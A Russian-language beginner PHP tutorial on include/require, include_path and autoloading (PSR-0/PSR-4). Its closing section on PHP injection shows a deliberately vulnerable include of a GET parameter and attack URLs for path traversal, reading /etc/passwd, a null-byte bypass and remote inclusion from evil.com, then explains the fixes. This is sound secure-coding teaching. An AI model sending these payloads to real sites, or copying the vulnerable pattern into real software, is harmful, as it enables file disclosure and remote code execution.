В продолжении серии «PHP для начинающих», сегодняшняя статья будет посвящена тому, как PHP ищет и подключает файлы.
Для чего и почему
PHP это скриптовый язык, созданный изначально для быстрого ваяния домашних страничек (да, да изначально это же был Personal Home Page Tools), а в дальнейшем на нём уже стали создавать магазины, социалки и другие поделки на коленке которые выходят за рамки задуманного, но к чему это я – а к тому, что чем больше функционала закодировано, тем больше желание его правильно структурировать, избавиться от дублирования кода, разбить на логические кусочки и подключать лишь при необходимости (это тоже самое чувство, которое возникло у вас, когда вы читали это предложение, его можно было бы разбить на отдельные кусочки). Для этой цели в PHP есть несколько функции, общий смысл которых сводится к подключению и интерпретации указанного файла. Давайте рассмотрим на примере подключения файлов:
// file variable.php
$a = 0;
// file increment.php
$a++;
// file index.php
include ('variable.php');
include ('increment.php');
include ('increment.php');
echo $a;
Если запустить скрипт index.php, то PHP всё это будет последовательно подключать и выполнять:
$a = 0;
$a++;
$a++;
echo $a; // выведет 2
Когда файл подключается, то его код оказывается в той же области видимости, что и строка в которой его подключили, таким образом все переменные, доступные в данной строке будут доступны и в подключаемом файле. Если в подключаемом файле были объявлены классы или функции, то они попадают в глобальную область видимости (если конечно для них не был указан namespace).
Если вы подключаете файл внутри функции, то подключаемые файлы получают доступ к области видимости функции, таким образом следующий код тоже будет работать:
function() {
$a = 0;
include ('increment.php');
include ('increment.php');
echo $a;
}
a(); // выведет 2
Отдельно отмечу магические константы:
__DIR__
,__FILE__
,__LINE__
и прочие — они привязаны к контексту и выполняются до того, как происходит включение
Особенностью подключения файлов является тот момент, что при подключении файла парсинг переключается в режим HTML, по этой причине любой код внутри включаемого файла должен быть заключен в PHP теги:
<?php
// подключаемый код
// ...
//
?>
Если у вас в файле только PHP код, то закрывающий тег принято опускать, дабы случайно не забыть какие-нить символы после закрывающего тега, что чревато проблемами (об этом я ещё расскажу в следующей статье).
А вы видели сайт-файл на 10 000 строк? Аж слёзы на глазах (╥_╥)…
Функции подключения файлов
Как уже было сказано выше, в PHP существует несколько функций для подключения файлов:
- include — включает и выполняет указанный файл, если не находит — выдаёт предупреждение
E_WARNING
- include_once — аналогично функции выше, но включает файл единожды
- require — включает и выполняет указанный файл, если не находит — выдаёт фатальную ошибку
E_ERROR
- require_once — аналогично функции выше, но включает файл единожды
В действительности, это не совсем функции, это специальные языковые конструкции, и можно круглые скобочки не использовать. Кроме всего прочего есть и другие способы подключения и выполнения файлов, но это уже сами копайте, пусть это будет для вас «задание со звёздочкой» ;)
Давайте разберём на примерах различия между require
и require_once
, возьмём один файл echo.php:
<p>text of file echo.php</p>
И будем его подключать несколько раз:
<?php
// подключит и выполнит файл
// вернёт 1
require_once 'echo.php';
// файл не будет подключён, т.к. уже подключали
// вернёт true
require_once 'echo.php';
// подключит и выполнит файл
// вернёт 1
require 'echo.php';
Результатом выполнения будет два подключения файла echo.php:
<p>text of file echo.php</p>
<p>text of file echo.php</p>
Существует ещё парочка директив, которые влияют на подключение, но они вам не потребуются — auto_prepend_file и auto_append_file. Эти директивы позволяют установить файлы которые будут подключены до подключения всех файлов и после выполнения всех скриптов соответственно. Я даже не могу придумать «живой» сценарий, когда это может потребоваться.
auto_prepend_file
и auto_append_file
, менять их можно только в php.ini, .htaccess или httpd.conf (см. PHP_INI_PERDIR) :)
Где ищет?
PHP ищет подключаемые файлы в директориях прописанных в директиве include_path. Эта директива также влияет на работу функций fopen()
, file()
, readfile()
и file_get_contents()
. Алгоритм работы достаточно простой — при поиске файлов PHP по очереди проверяет каждую директорию из include_path
, пока не найдет подключаемый файл, если не найдёт — вернёт ошибку. Для изменения include_path
из скрипта следует использовать функцию set_include_path().
При настройке include_path
следует учитывать один важный момент — в качестве разделителя путей в Windows и Linux используются различные символы — ";" и ":" соответственно, так что при указании своей директории используйте константу PATH_SEPARATOR
, например:
// пример пути в linux
$path = '/home/dev/library';
// пример пути в windows
$path = 'c:UsersDevLibrary';
// для linux и windows код изменение include_path идентичный
set_include_path(get_include_path() . PATH_SEPARATOR . $path);
Когда вы прописываете include_path
в ini файле, то можете использовать переменные окружения типа ${USER}
:
include_path = ".:${USER}/my-php-library"
Если при подключении файла вы прописываете абсолютный путь (начинающийся с "/") или относительный (начинающийся с "." или ".."), то директива include_path
будет проигнорирована, а поиск будет осуществлён только по указанному пути.
Возможно стоило бы рассказать и про safe_mode, но это уже давно история (с версии 5.4), и я надеюсь вы сталкиваться с ним не будете, но если вдруг, то чтобы знали, что такое было, но прошло...
Использование return
Расскажу о небольшом life-hack'е — если подключаемый файл возвращает что-либо с использованием конструкции return
, то эти данные можно получить и использовать, таким образом можно легко организовать подключение файлов конфигурации, приведу пример для наглядности:
return [
'host' => 'localhost',
'user' => 'root',
'pass' => ''
];
$dbConfig = require 'config/db.php';
var_dump($dbConfig);
/*
array(
'host' => 'localhost',
'user' => 'root',
'pass' => ''
)
*/
Занимательные факты, без которых жилось и так хорошо: если во включаемом файле определены функции, то они могут быть использованы в основном файле вне зависимости от того, были ли они объявлены до return или после
config
|-- default
| |-- db.php
| |-- debug.php
| |-- language.php
| `-- template.php
|-- development
| `-- db.php
`-- production
|-- db.php
`-- language.php
При этом код должен работать следующим образом:
- если в системном окружении есть переменная
PROJECT_PHP_SERVER
и она равнаdevelopment
, то должны быть подключены все файлы из папки default, данные занесены в перемененную$config
, затем подключены файлы из папки development, а полученные данные должны перетереть соответствующие пункты сохраненные в$config
- аналогичное поведение если
PROJECT_PHP_SERVER
равнаproduction
(естественно только для папки production) - если переменной нет, или она задана неверно, то подключаются только файлы из папки default
Автоматическое подключение
Конструкции с подключением файлов выглядят очень громоздко, так и ещё и следить за их обновлением — ещё тот подарочек, зацените кусочек кода из примера статьи про исключения:
// load all files w/out autoloader
require_once 'Education/Command/AbstractCommand.php';
require_once 'Education/CommandManager.php';
require_once 'Education/Exception/EducationException.php';
require_once 'Education/Exception/CommandManagerException.php';
require_once 'Education/Exception/IllegalCommandException.php';
require_once 'Education/RequestHelper.php';
require_once 'Education/Front.php';
Первой попыткой избежать подобного «счастья» было появление функции __autoload. Сказать точнее, это была даже не определенная функция, эту функцию вы должны были определить сами, и уже с её помощью нужно было подключать необходимые нам файлы по имени класса. Единственным правилом считалось, что для каждого класса должен быть создан отдельный файл по имени класса (т.е. myClass должен быть внутри файла myClass.php). Вот пример реализации такой функции __autoload()
(взят из комментариев к официальному руководству):
Класс который будем подключать:
// класс myClass в отдельном файле myClass.php
class myClass {
public function __construct() {
echo "myClass init'ed successfuly!!!";
}
}
Файл, который подключает данный класс:
// пример реализации
// ищем файлы согласно директивы include_path
function __autoload($classname) {
$filename = $classname .".php";
include_once $filename;
}
// создаём класс
$obj = new myClass();
Теперь о проблемах с данной функцией — представьте ситуацию, что вы подключаете сторонний код, а там уже кто-то прописал функцию __autoload()
для своего кода, и вуаля:
Fatal error: Cannot redeclare __autoload()
Чтобы такого не было, создали функцию, которая позволяет регистрировать произвольную функцию или метод в качестве загрузчика классов — spl_autoload_register. Т.е. мы можем создать несколько функций с произвольным именем для загрузки классов, и зарегистрировать их с помощью spl_autoload_register
. Теперь index.php
будет выглядеть следующим образом:
// пример реализации
// ищем файлы согласно директивы include_path
function myAutoload($classname) {
$filename = $classname .".php";
include_once($filename);
}
// регистрируем загрузчик
spl_autoload_register('myAutoload');
// создаём класс
$obj = new myClass();
Рубрика «а вы знали?»: первый параметр
spl_autoload_register()
не является обязательным, и вызвав функцию без него, в качестве загрузчика будет использоваться функция spl_autoload, поиск будет осуществлён по папкам изinclude_path
и файлам с расширением.php
и.inc
, но этот список можно расширить с помощью функции spl_autoload_extensions
Теперь каждый разработчик может регистрировать свой загрузчик, главное чтобы имена классов не совпадали, но это не должно стать проблемой, если вы используете пространства имён.
Поскольку уже давно существует такой продвинутый функционал как
spl_autoload_register()
, то функцию__autoload()
уже заявлена как deprecated в PHP 7.1, а это значит, что в обозримом будущем данную функцию и вовсе уберут (Х_х)
Ну более-менее картина прояснилась, хотя погодите, все зарегистрированные загрузчики становятся в очередь, по мере их регистрации, соответственно, если кто-то нахимичил в своё загрузчике, то вместо ожидаемого результата может получится очень неприятный баг. Чтобы такого не было, взрослые умные дядьки описали стандарт, который позволяет подключать сторонние библиотеки без проблем, главное чтобы организация классов в них соответствовала стандарту PSR-0 (устарел уже лет 10 как) или PSR-4. В чём суть требований описанных в стандартах:
- Каждая библиотека должна жить в собственном пространстве имён (т.н. vendor namespace)
- Для каждого пространства имён должна быть создана собственная папка
- Внутри пространства имён могут быть свои подпространства — тоже в отдельных папках
- Один класс — один файл
- Имя файла с расширением
.php
должно точно соответствовать имени класса
Пример из мануала:
Полное имя класса | Пространство имён | Базовая директория | Полный путь |
---|---|---|---|
AcmeLogWriterFile_Writer | AcmeLogWriter | ./acme-log-writer/lib/ | ./acme-log-writer/lib/File_Writer.php |
AuraWebResponseStatus | AuraWeb | /path/to/aura-web/src/ | /path/to/aura-web/src/Response/Status.php |
SymfonyCoreRequest | SymfonyCore | ./vendor/Symfony/Core/ | ./vendor/Symfony/Core/Request.php |
ZendAcl | Zend | /usr/includes/Zend/ | /usr/includes/Zend/Acl.php |
Различия этих двух стандартов, лишь в том, что PSR-0 поддерживает старый код без пространства имён (т.е. до версии 5.3.0), а PSR-4 избавлен от этого анахронизма, да ещё и позволяет избежать ненужной вложенности папок.
Благодаря этим стандартам, стало возможно появление такого инструмента как composer — универсального менеджера пакетов для PHP. Если кто пропустил, то есть хороший доклад от pronskiy про данный инструмент.
PHP-инъекция
Ещё хотел рассказать о первой ошибки всех, кто делает единую точку входа для сайта в одном index.php
и называет это MVC-фреймворком:
<?php
$page = $_GET['page'] ?? die('Wrong filename');
if (!is_file($page)) {
die('Wrong filename');
}
include $page;
Смотришь на код, и так и хочется чего-нить вредоносного туда передать:
// получить неожиданное поведение системы
http://domain.com/index.php?page=../index.php
// прочитать файлы в директории сервера
http://domain.com/index.php?page=config.ini
// прочитать системные файлы
http://domain.com/index.php?page=/etc/passwd
// запустить файлы, которые мы заранее залили на сервер
http://domain.com/index.php?page=user/backdoor.php
Первое, что приходит на ум — принудительно добавлять расширение .php
, но в ряде случаев это можно обойти «благодаря» уязвимости нулевого байта (почитайте, эту уязвимость уже давно исправили, но вдруг вам попадётся интерпретатор более древний, чем PHP 5.3, ну и для общего развития тоже рекомендую):
// прочитать системные файлы
http://domain.com/index.php?page=/etc/passwd%00
В современных версиях PHP наличие символа нулевого байта в пути подключаемого файла сразу приводит к соответствующей ошибке подключения, и даже если указанный файл существует и его можно подключить, то в результате всегда будет ошибка, проверяется это следующим образом
strlen(Z_STRVAL_P(inc_filename)) != Z_STRLEN_P(inc_filename)
(это из недров самого PHP)
Вторая «стоящая» мысль, это проверка на нахождение файла в текущей директории:
<?php
$page = $_GET['page'] ?? die('Wrong filename');
if (strpos(realpath($page), __DIR__) !== 0) {
die('Wrong path to file');
}
include $page . '.php';
Третья, но не последняя модификация проверки, это использование директивы open_basedir, с её помощью можно указать директорию, где именно PHP будет искать файлы для подключения:
<?php
$page = $_GET['page'] ?? die('Wrong filename');
ini_set('open_basedir', __DIR__);
include $page . '.php';
Будьте внимательны, данная директива влияет не только на подключение файлов, но и на всю работу с файловой системой, т.е. включая данное ограничение вы должны быть уверены, что ничего не забыли вне указанной директории, ни кешированные данные, ни какие-либо пользовательские файлы (хотя функции
is_uploaded_file()
иmove_uploaded_file()
продолжат работать с временной папкой для загруженных файлов).
Какие ещё возможны проверки? Уйма вариантов, всё зависит от архитектуры вашего приложения.
Хотел ещё вспомнить о существовании «чудесной» директивы allow_url_include (у неё зависимость от allow_url_fopen), она позволяет подключать и выполнять удаленный PHP файлы, что куда как опасней для вашего сервера:
// подключаем удалённый PHP скрипт
http://domain.com/index.php?page=http://evil.com/index.php
Увидели, запомнили, и никогда не пользуйтесь, благо по умолчанию выключено. Данная возможность вам потребуется чуть реже, чем никогда, во всех остальных случаях закладывайте правильную архитектуру приложения, где различные части приложения общаются посредством API.
В заключение
Данная статья — основа-основ в PHP, так что изучайте внимательно, выполняйте задания и не филоньте, за вас никто учить не будет.
P.S.
Это репост из серии статей «PHP для начинающих»:
- Сессия
- Подключение файлов
Если у вас есть замечания по материалу статьи, или возможно по форме, то описывайте в комментариях суть, и мы сделаем данный материал ещё лучше.
Автор: AntonShevchuk